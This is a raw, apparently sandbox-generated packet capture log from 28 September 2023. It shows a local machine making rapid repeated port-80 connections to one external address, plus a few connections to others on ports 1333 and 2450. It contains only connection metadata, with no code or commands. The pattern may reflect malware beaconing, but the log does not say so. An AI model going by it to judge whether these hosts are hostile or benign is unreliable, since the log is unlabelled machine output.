                                                                                              Sep 28, 2023 06:02:05.556664944 CEST804983095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:05.556952953 CEST804983195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:05.556972027 CEST4983080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:05.557133913 CEST4983180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:05.557377100 CEST4983180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:05.741947889 CEST804983195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:05.744390011 CEST804983195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:05.744554996 CEST4983180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:05.856703997 CEST4983180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:05.857199907 CEST4983480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:06.040851116 CEST804983195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:06.040934086 CEST4983180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:06.053905964 CEST804983495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:06.054174900 CEST4983480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:06.054275036 CEST4983480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:06.252863884 CEST804983495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:06.256072998 CEST804983495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:06.256304979 CEST4983480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:06.488720894 CEST4983480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:06.489222050 CEST4983580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:06.685391903 CEST804983495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:06.685475111 CEST4983480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:06.685911894 CEST804983595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:06.685997963 CEST4983580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:06.686258078 CEST4983580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:06.883407116 CEST804983595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:06.885348082 CEST804983595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:06.885435104 CEST4983580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:07.171386957 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:02:07.171673059 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:02:07.294076920 CEST4983580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:07.294634104 CEST4983780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:07.482317924 CEST804983795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:07.482521057 CEST4983780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:07.482656002 CEST4983780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:07.491332054 CEST804983595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:07.491547108 CEST4983580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:07.670169115 CEST804983795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:07.675833941 CEST804983795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:07.675991058 CEST4983780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:07.782052994 CEST4983780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:07.784208059 CEST4983880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:07.969994068 CEST804983795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:07.970278978 CEST4983780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:07.980014086 CEST804983895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:07.980115891 CEST4983880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:07.980479956 CEST4983880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:08.176578045 CEST804983895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:08.182619095 CEST804983895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:08.182807922 CEST4983880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:08.257177114 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:08.294032097 CEST4983880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:08.294538975 CEST4983980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:08.479084969 CEST804983995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:08.479470015 CEST4983980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:08.479554892 CEST4983980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:08.490184069 CEST804983895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:08.490276098 CEST4983880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:08.665215015 CEST804983995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:08.670905113 CEST804983995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:08.670958996 CEST4983980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:08.778557062 CEST4983980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:08.778692007 CEST4984180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:08.963809013 CEST804983995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:08.964032888 CEST4983980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:08.972728968 CEST804984195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:08.973289967 CEST4984180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:08.973584890 CEST4984180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:09.168091059 CEST804984195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:09.172255993 CEST804984195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:09.172466993 CEST4984180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:09.278770924 CEST4984180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:09.279145956 CEST4984280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:09.463526964 CEST804984295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:09.463743925 CEST4984280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:09.463850975 CEST4984280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:09.472695112 CEST804984195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:09.472883940 CEST4984180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:09.648173094 CEST804984295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:09.652694941 CEST804984295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:09.652887106 CEST4984280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:09.764944077 CEST4984280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:09.765435934 CEST4984380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:09.949563026 CEST804984295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:09.949721098 CEST4984280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:09.953526020 CEST804984395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:09.953720093 CEST4984380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:09.953857899 CEST4984380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:10.142121077 CEST804984395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:10.146848917 CEST804984395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:10.147133112 CEST4984380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:10.263005972 CEST4984380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:10.263422966 CEST4984580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:10.451694012 CEST804984395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:10.451929092 CEST4984380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:10.464375973 CEST804984595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:10.464448929 CEST4984580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:10.464689016 CEST4984580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:10.665671110 CEST804984595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:10.671082973 CEST804984595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:10.671165943 CEST4984580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:10.778669119 CEST4984580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:10.779057980 CEST4984680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:10.972546101 CEST804984695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:10.972748041 CEST4984680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:10.973098040 CEST4984680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:10.979494095 CEST804984595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:10.979572058 CEST4984580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:11.166471004 CEST804984695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:11.171799898 CEST804984695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:11.171885967 CEST4984680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:11.278666019 CEST4984680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:11.279201984 CEST4984780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:11.472213984 CEST804984695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:11.472551107 CEST4984680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:11.475924015 CEST804984795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:11.476124048 CEST4984780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:11.476481915 CEST4984780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:11.672826052 CEST804984795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:11.677721977 CEST804984795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:11.677916050 CEST4984780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:11.794151068 CEST4984780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:11.794455051 CEST4985180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:11.982727051 CEST804985195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:11.982979059 CEST4985180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:11.983122110 CEST4985180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:11.990936995 CEST804984795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:11.991127968 CEST4984780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:12.171365976 CEST804985195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:12.177068949 CEST804985195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:12.177149057 CEST4985180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:12.279375076 CEST4985180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:12.279838085 CEST4985280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:12.467046022 CEST804985195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:12.467135906 CEST4985180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:12.479490995 CEST804985295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:12.479595900 CEST4985280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:12.479801893 CEST4985280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:12.679235935 CEST804985295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:12.685281992 CEST804985295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:12.685359001 CEST4985280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:12.795694113 CEST4985280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:12.796194077 CEST4985480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:12.990483999 CEST804985495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:12.990633965 CEST4985480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:12.990849018 CEST4985480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:12.995349884 CEST804985295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:12.995449066 CEST4985280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:13.184879065 CEST804985495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:13.191716909 CEST804985495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:13.191821098 CEST4985480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:13.293970108 CEST4985480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:13.294414043 CEST4985580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:13.482754946 CEST804985595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:13.482846022 CEST4985580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:13.483092070 CEST4985580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:13.487706900 CEST804985495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:13.487783909 CEST4985480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:13.671375036 CEST804985595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:13.678754091 CEST804985595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:13.678860903 CEST4985580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:13.794502974 CEST4985580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:13.794857025 CEST4985780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:13.983505964 CEST804985595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:13.983608007 CEST4985580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:13.992710114 CEST804985795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:13.992882013 CEST4985780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:13.994777918 CEST4985780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:14.191871881 CEST804985795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:14.196062088 CEST804985795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:14.196136951 CEST4985780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:14.309637070 CEST4985780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:14.310112953 CEST4985880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:14.493710041 CEST804985895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:14.493813038 CEST4985880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:14.494052887 CEST4985880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:14.506365061 CEST804985795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:14.506481886 CEST4985780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:14.678013086 CEST804985895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:14.682311058 CEST804985895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:14.682394028 CEST4985880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:14.795423985 CEST4985880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:14.795769930 CEST4986480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:14.979119062 CEST804985895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:14.979252100 CEST4985880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:14.994400978 CEST804986495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:14.994515896 CEST4986480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:14.994776011 CEST4986480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:15.193981886 CEST804986495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:15.195734024 CEST804986495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:15.195785999 CEST4986480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:15.309638977 CEST4986480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:15.310158968 CEST4986580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:15.497339964 CEST804986595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:15.497445107 CEST4986580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:15.498146057 CEST4986580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:15.508797884 CEST804986495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:15.508928061 CEST4986480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:15.685436964 CEST804986595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:15.686594963 CEST804986595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:15.686855078 CEST4986580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:15.794075966 CEST4986580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:15.794574976 CEST4986780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:15.981569052 CEST804986595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:15.981765985 CEST4986580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:15.987787962 CEST804986795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:15.987875938 CEST4986780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:15.988111973 CEST4986780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:16.181446075 CEST804986795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:16.182830095 CEST804986795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:16.183310032 CEST4986780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:16.283212900 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:02:16.284739017 CEST498012450192.168.2.381.19.131.36
                                                                                              Sep 28, 2023 06:02:16.294076920 CEST4986780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:16.294590950 CEST4986980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:16.482141018 CEST804986995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:16.482403040 CEST4986980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:16.482616901 CEST4986980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:16.487340927 CEST804986795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:16.487468004 CEST4986780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:16.494680882 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:02:16.670133114 CEST804986995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:16.671495914 CEST804986995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:16.671660900 CEST4986980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:16.778369904 CEST4986980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:16.778742075 CEST4987080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:16.966144085 CEST804986995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:16.966651917 CEST4986980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:16.974304914 CEST804987095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:16.974572897 CEST4987080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:16.974688053 CEST4987080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:17.170563936 CEST804987095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:17.171869040 CEST804987095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:17.171952963 CEST4987080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:17.278845072 CEST4987080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:17.279123068 CEST4987280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:17.475084066 CEST804987095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:17.475228071 CEST4987080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:17.477349043 CEST804987295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:17.477556944 CEST4987280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:17.477677107 CEST4987280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:17.674865961 CEST804987295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:17.676160097 CEST804987295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:17.676460028 CEST4987280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:17.778556108 CEST4987280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:17.778884888 CEST4987380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:17.976700068 CEST804987395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:17.976939917 CEST4987380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:17.977097988 CEST804987295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:17.977183104 CEST4987280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:17.977302074 CEST4987380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:18.175065041 CEST804987395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:18.176388979 CEST804987395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:18.176451921 CEST4987380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:18.278655052 CEST4987380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:18.279473066 CEST4987480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:18.476634026 CEST804987395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:18.476701975 CEST4987380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:18.483603954 CEST804987495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:18.483762980 CEST4987480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:18.486567020 CEST4987480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:18.690180063 CEST804987495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:18.691539049 CEST804987495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:18.691622019 CEST4987480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:18.812130928 CEST4987480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:18.812566042 CEST4987680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:19.005975962 CEST804987695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:19.006072044 CEST4987680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:19.006444931 CEST4987680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:19.015757084 CEST804987495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:19.015825033 CEST4987480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:19.199623108 CEST804987695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:19.200793982 CEST804987695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:19.200892925 CEST4987680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:19.309725046 CEST4987680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:19.310499907 CEST4987780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:19.503531933 CEST804987695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:19.503622055 CEST4987680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:19.515573978 CEST804987795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:19.515739918 CEST4987780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:19.516036034 CEST4987780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:19.720998049 CEST804987795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:19.724180937 CEST804987795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:19.724414110 CEST4987780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:19.826400995 CEST4987780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:19.826752901 CEST4987980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.014086962 CEST804987995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:20.014322996 CEST4987980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.014475107 CEST4987980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.031259060 CEST804987795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:20.031496048 CEST4987780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.202306986 CEST804987995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:20.203572989 CEST804987995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:20.203639030 CEST4987980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.309930086 CEST4987980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.310550928 CEST4988080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.498030901 CEST804987995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:20.498126030 CEST4987980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.506652117 CEST804988095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:20.506843090 CEST4988080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.506994009 CEST4988080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.702994108 CEST804988095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:20.704276085 CEST804988095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:20.704469919 CEST4988080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.809772015 CEST4988080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.810369015 CEST4988180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.997742891 CEST804988195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:20.997838020 CEST4988180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:20.998195887 CEST4988180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:21.005994081 CEST804988095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:21.006081104 CEST4988080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:21.190664053 CEST804988195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:21.190721035 CEST804988195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:21.190790892 CEST4988180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:21.294272900 CEST4988180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:21.294862032 CEST4988380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:21.481872082 CEST804988195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:21.482033968 CEST4988180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:21.489877939 CEST804988395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:21.490190983 CEST4988380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:21.490695953 CEST4988380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:21.685406923 CEST804988395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:21.686364889 CEST804988395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:21.686470985 CEST4988380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:21.794429064 CEST4988380192.168.2.395.141.41.12
